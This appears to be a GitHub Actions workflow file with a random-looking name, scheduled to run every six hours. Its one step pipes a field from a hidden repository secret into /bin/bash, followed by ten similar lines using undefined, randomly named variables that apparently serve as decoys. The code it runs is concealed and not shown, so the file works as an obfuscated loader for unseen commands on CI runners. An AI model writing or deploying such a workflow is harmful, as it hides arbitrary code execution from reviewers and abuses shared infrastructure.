name: zhaoqingyiii

on:
  workflow_dispatch:
  schedule:
    - cron: '18 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaoqingyiii
        env:
          e2: ${{ secrets.e2 }}
        run: |
          echo $e2 | jq -r .rws97 | /bin/bash
          echo $ydjrd4 | jq -r .boi4 | /bin/bash
          echo $j246 | jq -r .d9 | /bin/bash
          echo $ho54442 | jq -r .pcmbw11 | /bin/bash
          echo $kxrac48665 | jq -r .dhkc55154 | /bin/bash
          echo $gytbj84 | jq -r .xrj0635 | /bin/bash
          echo $zpqgk1418 | jq -r .bzwh330 | /bin/bash
          echo $jvsw7 | jq -r .cy502 | /bin/bash
          echo $ngvtn44 | jq -r .f11085 | /bin/bash
          echo $sbmo2 | jq -r .g03653 | /bin/bash
          echo $d10092 | jq -r .brjul65 | /bin/bash

